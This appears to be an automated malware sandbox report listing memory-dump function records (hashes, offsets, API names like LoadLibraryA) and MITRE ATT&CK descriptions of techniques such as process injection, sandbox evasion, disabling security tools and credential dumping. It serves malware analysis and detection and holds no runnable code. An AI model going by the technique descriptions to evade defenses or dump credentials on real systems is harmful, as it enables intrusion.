Instruction ID: 9deabf40d5b5b712e6f338594c33261759f40fcce620a3c5a50b49302dc953c4
Opcode Fuzzy Hash: 823ff0d5a3937635c3ae888fec140c6b9333233f83347e81d79bc55e0f2ff694
Instruction Fuzzy Hash: B041C734B093854FD746D77898646AD3FF19F86300B1580BBC448DB292EB389C068762

Uniqueness

Uniqueness Score: -1.00%

Function 00FAAE20, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bd9f76913c3be1ff6eae8bc1e0d1bcccbf46130ff5ecdc7e18ed432b2813770
Instruction ID: 2f615cd5b4394f35d70b950e8f87b1757b05e75a3028ae64dda4f9cd9b4fa7e2
Opcode Fuzzy Hash: 6bd9f76913c3be1ff6eae8bc1e0d1bcccbf46130ff5ecdc7e18ed432b2813770
Instruction Fuzzy Hash: 4431F730B093844FDB0657B988A46AE7FE69FC6310B0544BBD545CB3D2EE348C06C762

Uniqueness

Uniqueness Score: -1.00%

Function 00FABA38, Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30153c2f591c3d3ee77a24b99df4562434522fe8eb73f6a96c8846b6a27e2839
Instruction ID: 50d8ec0c1bed818404679caba320db2edca871f97bf242b0cc3b2bafd0e0839d
Opcode Fuzzy Hash: 30153c2f591c3d3ee77a24b99df4562434522fe8eb73f6a96c8846b6a27e2839
Instruction Fuzzy Hash: 3E31D471F083849FCB15DBB888645AE7FF29F85250B1540BBD509DB292EE388C42C752

Uniqueness

Uniqueness Score: -1.00%

Function 00FA187B, Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 267bae4063467f6863c3b7dc9fb6e1977aa0cdf6aa0e639e7f11b6f3ad3950d5
Instruction ID: 668e27a3db1bf8a27d9043a21f3887c40ba85be8d7bd455518fd5321b8b3a59c
Opcode Fuzzy Hash: 267bae4063467f6863c3b7dc9fb6e1977aa0cdf6aa0e639e7f11b6f3ad3950d5
Instruction Fuzzy Hash: D2216B61E042E095D761621C849835EEE416B57354F5AC2AEC4FD6B382C6778C87D363

Uniqueness

Uniqueness Score: -1.00%

Function 00FA0C18, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1426afc943cb5469dd60312b7854f03c86b21c40be5f9bc61736decc6d0050a0
Instruction ID: 5304bd68ec5561fd28ec1183e059fc42b2441e05510afad75b52226440ad3388
Opcode Fuzzy Hash: 1426afc943cb5469dd60312b7854f03c86b21c40be5f9bc61736decc6d0050a0
Instruction Fuzzy Hash: 9511DD71F002188BCB04EBB9D8146DEBBE69FC8360B110579DA06F7380EE319D018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 1FFD2F8A, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.603156247.000000001FFD0000.00000040.00000001.sdmp, Offset: 1FFD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e43e2d8954beea749a0c812d7ebdca9ab51e020ed960077497bb5cfd417cc0ae
Instruction ID: 2dcf7aed678842da1b1de987266130329e3277f3eddcc96d56c0f3cda00757d1
Opcode Fuzzy Hash: e43e2d8954beea749a0c812d7ebdca9ab51e020ed960077497bb5cfd417cc0ae
Instruction Fuzzy Hash: D121C5B5608341AFD340CF19D880A5BFBE4FF89664F04896EF998D7311D375E9088BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FAAD4F, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79708e339e2774592379ade92bf46ef8c324f7a4bf86b0499f87e2942454749c
Instruction ID: 88ad29c466bf73204e464516b9f7a1463f475fb1a77ca0590c7a965569de4897
Opcode Fuzzy Hash: 79708e339e2774592379ade92bf46ef8c324f7a4bf86b0499f87e2942454749c
Instruction Fuzzy Hash: 68118275F012148FCF40EBBCD8946EE7BF1AFC9210725406AD449E3340EB345D028B96

Uniqueness

Uniqueness Score: -1.00%

Function 1FFD39FC, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.603156247.000000001FFD0000.00000040.00000001.sdmp, Offset: 1FFD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d353c34a273237bdfb9aaac9f5747a1e1147e437b6fb8eded32e56600a3b867c
Instruction ID: fbb65af122f5830c0d98ce8f44f93ad6307de9b4cfa4690858462ab2a3d2df37
Opcode Fuzzy Hash: d353c34a273237bdfb9aaac9f5747a1e1147e437b6fb8eded32e56600a3b867c
Instruction Fuzzy Hash: 1511BAB5508301AFD340CF19D880A5BFBE4FB88664F04896EF998D7311D375EA048FA6

Uniqueness

Uniqueness Score: -1.00%

Function 1D65075C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.601247140.000000001D650000.00000040.00000040.sdmp, Offset: 1D650000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2797c8b99d76305c412dd3cdd5460f0edb56d84230ccb3904195788f0b11248c
Instruction ID: e9f8b4bc740425f29f945e2f637c4565352f7db4d99ba9b891bf6322363a6fe3
Opcode Fuzzy Hash: 2797c8b99d76305c412dd3cdd5460f0edb56d84230ccb3904195788f0b11248c
Instruction Fuzzy Hash: 7311B435204685EFD305CB20C980B26BB95EB8CB48F24C99DE9491B653C777D843CE52

Uniqueness

Uniqueness Score: -1.00%

Function 00FA0AF8, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21a0bc8762c7b6ec08a8e3474a140be17af82d51d499bef7afd1f7c2e4cc55da
Instruction ID: 8d9de69241312a9523fd404420e7f757d2b7c93b0633748249e9e0cb642711d2
Opcode Fuzzy Hash: 21a0bc8762c7b6ec08a8e3474a140be17af82d51d499bef7afd1f7c2e4cc55da
Instruction Fuzzy Hash: B6110C75F112198F8B84EBBDD4446AEBBF5ABCD250761806AD509E3340EF349D028BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00FA0293, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0da088048d4c9bc5ef4cd052d5da133733afab4329e9f4409b98e3b8e8e84eb2
Instruction ID: e6e1d4f42ef552ffc6e1e32c6eab71768ccd75dc173fd79f434be5e1c4390d7f
Opcode Fuzzy Hash: 0da088048d4c9bc5ef4cd052d5da133733afab4329e9f4409b98e3b8e8e84eb2
Instruction Fuzzy Hash: FF019631B112149FDF54AB7998557AE7BE69BC4360F0404B6E909D3381EE34CD858B92

Uniqueness

Uniqueness Score: -1.00%

Function 00FAAD60, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4375c4ab77c0b9394e0b446bbbae5d9014783d7d6e5abaf19adf78f900a6b6e0
Instruction ID: 18b21bb3dbbc2457b0bffa8bab3d717078aa7e9b12a434649fcba48ab9f866a4
Opcode Fuzzy Hash: 4375c4ab77c0b9394e0b446bbbae5d9014783d7d6e5abaf19adf78f900a6b6e0
Instruction Fuzzy Hash: 2F110075F012188FCF84EBBDD444AAEBBF5ABCD250721416AD509E3340EF349D428B96

Uniqueness

Uniqueness Score: -1.00%

Function 00FABD38, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d0ece8371d37709224b01278700e854735bf2ac9662bbae0e5903f48544529f
Instruction ID: d8438e2ceb1bc89c541e4b30147a638b54722a509f122a33a5db40aae89045b5
Opcode Fuzzy Hash: 1d0ece8371d37709224b01278700e854735bf2ac9662bbae0e5903f48544529f
Instruction Fuzzy Hash: AF113C75F102198F8B84EBBDD8446AEBBF5AB8D250721402AD509E3345EF349D028BA6

Uniqueness

Uniqueness Score: -1.00%

Function 1D650731, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.601247140.000000001D650000.00000040.00000040.sdmp, Offset: 1D650000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae4a767ed30a10445e15c05bb07a7f4dec59eaa9ea998dd1de0dc223b3e38e
Instruction ID: 10e3b7170f4630d05ef9eadfa5076e0e1179945fa09db19b517efbc01cf45ae9
Opcode Fuzzy Hash: 6cae4a767ed30a10445e15c05bb07a7f4dec59eaa9ea998dd1de0dc223b3e38e
Instruction Fuzzy Hash: 8B11AC3510D7C19FC307CB20C990B51BFB1EF4A704F2989DAD8894B6A3C33A9856CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D6505D0, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.601247140.000000001D650000.00000040.00000040.sdmp, Offset: 1D650000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cf74cc49f660f23d0ee68e829249bc4cf0fc554766857f6ba734bbf7c3231c9
Instruction ID: e6dfc38ef9a41fda25ddd5f82bee6d84095660368f1ea65714db32106d1588ad
Opcode Fuzzy Hash: 9cf74cc49f660f23d0ee68e829249bc4cf0fc554766857f6ba734bbf7c3231c9
Instruction Fuzzy Hash: 9901D6755087809FC3418F1AEC41853BFF8DF8623070984AFED498B212D275B909CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00FA16FB, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7d14b45fc6070ac9d26470f2b763074823df0d98d73adb7effc20738166e664
Instruction ID: d8093f4aee21c4b4fe21f37984b7ad2974d9f8eaa661885d8775947ad4de2ffa
Opcode Fuzzy Hash: d7d14b45fc6070ac9d26470f2b763074823df0d98d73adb7effc20738166e664
Instruction Fuzzy Hash: EEF0F9B5E002199FCF80EFBD94446DEBFF5EB88690B11457AD509E3340EA3499018BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00FA1700, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8d1f1f13b36e0f1db70b6831297920137ae1860b1e25951ef2303cbcdaa69d8
Instruction ID: cc5e1c89eae796046f1eacf90b4bdea9e6b3cd2119fd2377e37d2793b7f48a51
Opcode Fuzzy Hash: b8d1f1f13b36e0f1db70b6831297920137ae1860b1e25951ef2303cbcdaa69d8
Instruction Fuzzy Hash: C3F01D75E002199FCF80EFBD84446DEBFF5EB88690F11447AD509E3340EA3499018BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00FA16F0, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30a91ab744b8adfe279db706d97db52762eb8102600da239b4355c1ee4cb8443
Instruction ID: cb9912686358b4841739ef8f2470a3592fd3b586b01ef0e64831230a18bb4383
Opcode Fuzzy Hash: 30a91ab744b8adfe279db706d97db52762eb8102600da239b4355c1ee4cb8443
Instruction Fuzzy Hash: 75F05476F012158FDF44DFB890452EE7BF1AB88390F214475D505E3340DA355D019BD1

Uniqueness

Uniqueness Score: -1.00%

Function 1D650818, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.601247140.000000001D650000.00000040.00000040.sdmp, Offset: 1D650000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction ID: 83c19d415798d60749b0c684dd66883e5522fc1bfbb760130aade8e08a2cfb9f
Opcode Fuzzy Hash: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction Fuzzy Hash: 94F0FB35108645DFC306CB40D940B15FBA2EB89718F24C6A9E9480B652C337D813DE81

Uniqueness

Uniqueness Score: -1.00%

Function 1D6505F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.601247140.000000001D650000.00000040.00000040.sdmp, Offset: 1D650000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f97df4a776c428ac6f58aae90ab4b33eeb31dd2364721d4742f9728a0a1cda5
Instruction ID: 2c9947c02e8d272bd925870af7f52a9d9048f9043ef63cc6056f855e3790d6fd
Opcode Fuzzy Hash: 1f97df4a776c428ac6f58aae90ab4b33eeb31dd2364721d4742f9728a0a1cda5
Instruction Fuzzy Hash: 4FE092B66047008BD650CF0BEC41452F7E4EB88630B08C07FDC0D8B701E679B509CEA6

Uniqueness

Uniqueness Score: -1.00%

Function 1FFD2FFF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.603156247.000000001FFD0000.00000040.00000001.sdmp, Offset: 1FFD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18db3f9b997997c12d9fe22b04b5a4f2244a2d5767db433f0a9721311df6bfd3
Instruction ID: e2f2912848e3060ac57b7a1243ea8c412b80272ad4937a8425d4bf990ad7eed7
Opcode Fuzzy Hash: 18db3f9b997997c12d9fe22b04b5a4f2244a2d5767db433f0a9721311df6bfd3
Instruction Fuzzy Hash: C8E020B25053006BD2108F069C45F63FB58EB80A30F08C457EE0C5F343D1B5B51489F5

Uniqueness

Uniqueness Score: -1.00%

Function 1FFD3A67, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.603156247.000000001FFD0000.00000040.00000001.sdmp, Offset: 1FFD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32719f743b0e4586e1ba5c8dc274306a48bcc3461586a61d6d6c94e110f173d1
Instruction ID: 6001cc733efcfa52bd7843fd9d37dd10bae4b1d6e9da13cc2912cd0bfce32e58
Opcode Fuzzy Hash: 32719f743b0e4586e1ba5c8dc274306a48bcc3461586a61d6d6c94e110f173d1
Instruction Fuzzy Hash: 3EE0D8B25443006BD2108F069C45B63FB98EB94A30F08C46BED0C5B342D1B5B51489F5

Uniqueness

Uniqueness Score: -1.00%

Function 00FAADBF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ba88194c1c41298245effed4910d72d703dadf752fc125fe123b721ed9f44e8
Instruction ID: d9d7a661bfdc5a488d016bb9579d3fef968fdb8c220d27df86ccf68ceb302c18
Opcode Fuzzy Hash: 3ba88194c1c41298245effed4910d72d703dadf752fc125fe123b721ed9f44e8
Instruction Fuzzy Hash: A0E0ED35F045188BCF44E7B9D4949DDB7F1AFC92147214065D509E7280EF31AD118B66

Uniqueness

Uniqueness Score: -1.00%

Function 00FABD97, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2361734e97147a0dbcde858f2fd175d5afdea15612104e8448e2c075322e1eb
Instruction ID: bf821ed81fb587a178be74e0ddc9bf1571b77f098a747154ac366a2a451fed05
Opcode Fuzzy Hash: e2361734e97147a0dbcde858f2fd175d5afdea15612104e8448e2c075322e1eb
Instruction Fuzzy Hash: 0CE06D35F001188BCF00E7B9E4948DDB3F1BB882143214065D509E7240EF30AD128B66

Uniqueness

Uniqueness Score: -1.00%

Function 00FA0B57, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6510167275beb28dc688840ed53a6e5b122d862317f4ef0c767a7361e1eb380f
Instruction ID: 55c0d320484643b725094dccb776f7605e0b6373aa1067928561a13317d634eb
Opcode Fuzzy Hash: 6510167275beb28dc688840ed53a6e5b122d862317f4ef0c767a7361e1eb380f
Instruction Fuzzy Hash: 47E0ED35F14518CBCF44E7B9E4949DDB7F1AFC82147218465D509E7240EF31AD118B66

Uniqueness

Uniqueness Score: -1.00%

Function 1D5C23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.601022258.000000001D5C2000.00000040.00000001.sdmp, Offset: 1D5C2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfbca028ef83365ddec7949990a03468926eed0cd470adf0c5b1f1fdc9715c29
Instruction ID: 078efda9d29dbdd4db582e3c042d1265fd86dceaafffac28e34d41df85e60b46
Opcode Fuzzy Hash: bfbca028ef83365ddec7949990a03468926eed0cd470adf0c5b1f1fdc9715c29
Instruction Fuzzy Hash: BED05E7A604A818FD3168A1CC1E0BA53BA8AB52B04F4648FDE8008B763C768D981D201

Uniqueness

Uniqueness Score: -1.00%

Function 1D5C23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.601022258.000000001D5C2000.00000040.00000001.sdmp, Offset: 1D5C2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db1556ec69eb3bd57309b03869d489a30bd9e85c7c9f1b7b57108c95a13072ef
Instruction ID: c601c2d6c9cd8360900f6f61fd6e40168409a9df23e3b0e4aea861e46b3a9a6d
Opcode Fuzzy Hash: db1556ec69eb3bd57309b03869d489a30bd9e85c7c9f1b7b57108c95a13072ef
Instruction Fuzzy Hash: 6AD052347002818BCB0ADB0CC6D0F6A37E8AB81B40F0248E8AC018F762C7B8E8C1CA00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B027A6, Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

`, xrefs: 00B028B9

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: a9f9b4775f04cb686efeafc0e830a9e4651b1da77dd509ab729f1e4b12a685d1
Instruction ID: 15273d24d42bd8e5c1b5dc4ac79d5e6d01985c7515dc2bdb3b5f95482345b4f9
Opcode Fuzzy Hash: a9f9b4775f04cb686efeafc0e830a9e4651b1da77dd509ab729f1e4b12a685d1
Instruction Fuzzy Hash: 879114B1640309AFFF344F14CD8ABEA3EA1FF45714F218168FE486A1C1C3B998889B45

Uniqueness

Uniqueness Score: -1.00%

Function 00B05122, Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 52a2afa7b2b8a4f52afef5280c14bff708d6273dc68c5608af8c416728b5ec14
Instruction ID: 0764e8371b48926f20085f6390601004a29bd9f7773e0181b3d6f39c87c226e4
Opcode Fuzzy Hash: 52a2afa7b2b8a4f52afef5280c14bff708d6273dc68c5608af8c416728b5ec14
Instruction Fuzzy Hash: 40719270904B428EDB35CF28C4D575ABFD1EF62360F1892D9D5A64F6EAC3748482CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00B0514A, Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: f0d66a6dcac6abb38488ad40f85148b06c464bcfcd1b9172397acbf14d736bbe
Instruction ID: f828387002f0df5ef47b6fd7f47e2e482b5a1b7a1b578c85984ae292c28a2dc4
Opcode Fuzzy Hash: f0d66a6dcac6abb38488ad40f85148b06c464bcfcd1b9172397acbf14d736bbe
Instruction Fuzzy Hash: C1419F70904782CECB35CF288895B16BFD1EF22360F09C2D9D9A64F6E7D2748442CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00B0514D, Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 7aea1b5578faf6ec522fc2663eca05c275412342cc3b925fc01b069a5889f9cb
Instruction ID: da755bb38e71118e8116288daaad5f6bd2b950a8be15a42de7c7ff83520f2b40
Opcode Fuzzy Hash: 7aea1b5578faf6ec522fc2663eca05c275412342cc3b925fc01b069a5889f9cb
Instruction Fuzzy Hash: A9418174904B82CEDB35CF28C485B16BFD1EF26360F09C2D9D9A64F6E6D2748442CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00B049BF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc46d65f9dc626cf9ecc1f79a1036d047d2afe130f9295e2331095b2717c963d
Instruction ID: 7b9eb3753228e72007cd4b89945fd03b50eb8b7a5e7172f1b6be2c43d910a87b
Opcode Fuzzy Hash: bc46d65f9dc626cf9ecc1f79a1036d047d2afe130f9295e2331095b2717c963d
Instruction Fuzzy Hash: AFE06DF8348580CFC725DB18C2C0E2A7BE4EB98310F6249E6EB034B696C731EC40DA19

Uniqueness

Uniqueness Score: -1.00%

Function 00B049C5, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ae8a49b6ac05096a31ca2bc49e0a03cedbb460ec335647580e7b50024e754d2
Instruction ID: 4d71594fb1b85cb4c20cc76cd16b66c356c4be6ba3d7a293677e02ae5baa5ecd
Opcode Fuzzy Hash: 1ae8a49b6ac05096a31ca2bc49e0a03cedbb460ec335647580e7b50024e754d2
Instruction Fuzzy Hash: E8F0EDF8395180CFC724DA18C6C4E2A7BE5EB98310F6188E2EA028B6A5C730EC40D619

Uniqueness

Uniqueness Score: -1.00%

Function 00B040D0, Relevance: .0, Instructions: 11libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00B05131,00B01E73,00000000,00000000,00000000,00000000,?,00000000), ref: 00B0439F

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1d6c2d38c3873c7ae14fd0db0712af50c838a54b9f282b207fd567e443b70287
Instruction ID: ed64840ac3fa7c595109b8323438b9356adc55e2c871be014a1e5d0a3f469685
Opcode Fuzzy Hash: 1d6c2d38c3873c7ae14fd0db0712af50c838a54b9f282b207fd567e443b70287
Instruction Fuzzy Hash: 5AC08CB5181300CFCD62CA09C3A0B503FE1AB28F60B3308E0F102ABAC2D3E5E880D800

Uniqueness

Uniqueness Score: -1.00%

Function 00B0263B, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e45669f9b4050cf2b62f290dc03973226e41d3a450d43ed3a4be57736caeddef
Instruction ID: 627d285e69e81b3986bd28879873748a2ae3e045fae43d09aea08ed8337765f9
Opcode Fuzzy Hash: e45669f9b4050cf2b62f290dc03973226e41d3a450d43ed3a4be57736caeddef
Instruction Fuzzy Hash: 03C04CB66515819FEF05DF0DC695B5073A0FB15784F4504E4DC42DB611D224E9068A04

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

